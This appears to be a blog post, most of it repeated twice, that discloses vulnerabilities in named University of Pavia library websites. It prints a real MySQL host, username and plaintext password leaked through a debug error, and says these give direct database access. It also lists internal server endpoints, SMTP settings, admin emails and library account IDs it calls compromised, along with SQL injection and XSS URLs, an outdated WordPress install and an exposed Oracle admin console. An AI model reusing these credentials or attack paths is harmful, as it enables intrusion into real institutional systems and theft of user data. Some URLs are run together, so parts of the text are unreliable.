Simple error that gives full access to the databases (of the biblio?)
We can raise an error by simply changing the value of managerName (I added "a")
http://ecnew.unipv.it/biblionauta/index.php?moduleName=user&managerName=logina&
archived: http://archive.is/ZDYzY
In the long error/debug result we can find several informations we can find the mysql user and passwords.
[type] => mysql_SGL
[host] => mysqlbib.unipv.it
[protocol] => tcp
[socket] =>
[port] => 3306
[user] => frameuser
[pass] => g0nzaga
[name] => framework_ecnew
path /home/isis/http/htdocs/biblionauta
The mysql server is mysqlbib.unipv.it and it also have an http server with phpmyadmin http://mysqlbib.unipv.it (archived: http://archive.is/3Enl1) - samples .
In a few words we can easily connect to the databases by using the credentials found in the logs.
Quite easy
We have also other informations regarding other severs where the current box/website, I suppose, makes soap requests.
[easyindexEnable] => 1
[wsdlEasyindex] => http://easyindex.unipv.it/easyindexam/ws/soap/easyindexam.wsdl
[wsdlEasycat] => http://ecnew.unipv.it/biblionauta/ws/soap/easycat.wsdl
[serverSoapEasycat] => http://ecnew.unipv.it/biblionauta/ws/soap/SoapServerEasycat.php
[rootSistema] => 4
[acquistaEnable] => 1
[ajaxEasycat] => 1
[ajaxTabellari] =>
[ajaxSerieInv] => 1
[ajaxRfid] => 1
[ajaxFondi] =>
[ajaxContatore] => 1
[ajaxStampaCollocazione] => 1
[topograficoEnable] => 1
[topograficoUrl] => https://mitch.unipv.it:4443/pls/user/MENU_TOPOGRAFICO$.Startup
Other informations regarding the smtp settings
[backend] => sendmail
[sendmailPath] => /usr/sbin/sendmail
[sendmailArgs] => -t -i
[smtpHost] => smtp.tiscali.it
[smtpLocalHost] =>
[smtpPort] => 25
[smtpAuth] => 0
[smtpUsername] =>
[smtpPassword] =>
)
[email] => Array
(
[admin] => polopav@nexusfi.it
[support] => polopav@unipv.it
[info] => polopav@unipv.it
----
All the accounts of the libraries listed in the pdf below are compromised
http://siba.unipv.it/biblioteche/portali/fluxus/doc/Biblioteche-Fluxus.pdf
and the following.
"U0100";"5"
"U0400";"9"
"U0500";"4"
"U0600";"5"
"U0813";"1"
"U0820";"1"
"U0830";"1"
"U0840";"1"
"U1700";"6"
"U1800";"2"
"U1803";"2"
"U1900";"10"
"U2000";"7"
"U2100";"7"
"U2200";"7"
"U2300";"3"
"U2400";"3"
"U2500";"3"
"U2600";"3"
"U2700";"7"
"U2802";"7"
"U2900";"7"
"U3000";"7"
"U3100";"7"
"U3200";"3"
"U3400";"3"
"U3500";"3"
"U4000";"3"
"U4100";"3"
"U4300";"3"
"U4400";"3"
"U4700";"7"
"U5000";"3"
"U6000";"3"
"U6100";"3"
"U7100";"3"
-
There are several passwords in clear text and several other in md5 hash that can be easily identified.
----------------------
http://opac.unipv.it/easyweb/w3006/index.php?scelta=campi&&biblio=[sqli]&lang=
http://archive.is/2FX63
there are several injections, XSS and other stuff. Too many.
----------------------
very old wordpress 3.5.1 that could lead to code execution, xss.
----------------------
http://archive.is/uk5BB
https://mitch.unipv.it:4443/em/console/ias/cluster/topology
oc4jadmin
----------------------
We can raise an error by simply changing the value of managerName (I added "a")
http://ecnew.unipv.it/biblionauta/index.php?moduleName=user&managerName=logina&
archived: http://archive.is/ZDYzY
In the long error/debug result we can find several informations we can find the mysql user and passwords.
[type] => mysql_SGL
[host] => mysqlbib.unipv.it
[protocol] => tcp
[socket] =>
[port] => 3306
[user] => frameuser
[pass] => g0nzaga
[name] => framework_ecnew
path /home/isis/http/htdocs/biblionauta
The mysql server is mysqlbib.unipv.it and it also have an http server with phpmyadmin http://mysqlbib.unipv.it (archived: http://archive.is/3Enl1) - samples .
In a few words we can easily connect to the databases by using the credentials found in the logs.
Quite easy
We have also other informations regarding other severs where the current box/website, I suppose, makes soap requests.
[easyindexEnable] => 1
[wsdlEasyindex] => http://easyindex.unipv.it/easyindexam/ws/soap/easyindexam.wsdl
[wsdlEasycat] => http://ecnew.unipv.it/biblionauta/ws/soap/easycat.wsdl
[serverSoapEasycat] => http://ecnew.unipv.it/biblionauta/ws/soap/SoapServerEasycat.php
[rootSistema] => 4
[acquistaEnable] => 1
[ajaxEasycat] => 1
[ajaxTabellari] =>
[ajaxSerieInv] => 1
[ajaxRfid] => 1
[ajaxFondi] =>
[ajaxContatore] => 1
[ajaxStampaCollocazione] => 1
[topograficoEnable] => 1
[topograficoUrl] => https://mitch.unipv.it:4443/pls/user/MENU_TOPOGRAFICO$.Startup
Other informations regarding the smtp settings
[backend] => sendmail
[sendmailPath] => /usr/sbin/sendmail
[sendmailArgs] => -t -i
[smtpHost] => smtp.tiscali.it
[smtpLocalHost] =>
[smtpPort] => 25
[smtpAuth] => 0
[smtpUsername] =>
[smtpPassword] =>
)
[email] => Array
(
[admin] => polopav@nexusfi.it
[support] => polopav@unipv.it
[info] => polopav@unipv.it
----
All the accounts of the libraries listed in the pdf below are compromised
http://siba.unipv.it/biblioteche/portali/fluxus/doc/Biblioteche-Fluxus.pdf
and the following.
"U0100";"5"
"U0400";"9"
"U0500";"4"
"U0600";"5"
"U0813";"1"
"U0820";"1"
"U0830";"1"
"U0840";"1"
"U1700";"6"
"U1800";"2"
"U1803";"2"
"U1900";"10"
"U2000";"7"
"U2100";"7"
"U2200";"7"
"U2300";"3"
"U2400";"3"
"U2500";"3"
"U2600";"3"
"U2700";"7"
"U2802";"7"
"U2900";"7"
"U3000";"7"
"U3100";"7"
"U3200";"3"
"U3400";"3"
"U3500";"3"
"U4000";"3"
"U4100";"3"
"U4300";"3"
"U4400";"3"
"U4700";"7"
"U5000";"3"
"U6000";"3"
"U6100";"3"
"U7100";"3"
-
There are several passwords in clear text and several other in md5 hash that can be easily identified.
----------------------
Sql injection, xss, etc in another website
http://opac.unipv.it/easyweb/w3006/index.php?scelta=campi&&biblio=PAV0U7&lang=http://opac.unipv.it/easyweb/w3006/index.php?scelta=campi&&biblio=[sqli]&lang=
http://archive.is/2FX63
there are several injections, XSS and other stuff. Too many.
----------------------
Code execution and xss in another website
http://openweb.unipv.itvery old wordpress 3.5.1 that could lead to code execution, xss.
----------------------
Oracle application server 10g
https://mitch.unipv.it:4443/http://archive.is/uk5BB
https://mitch.unipv.it:4443/em/console/ias/cluster/topology
oc4jadmin
----------------------
Comments
Post a Comment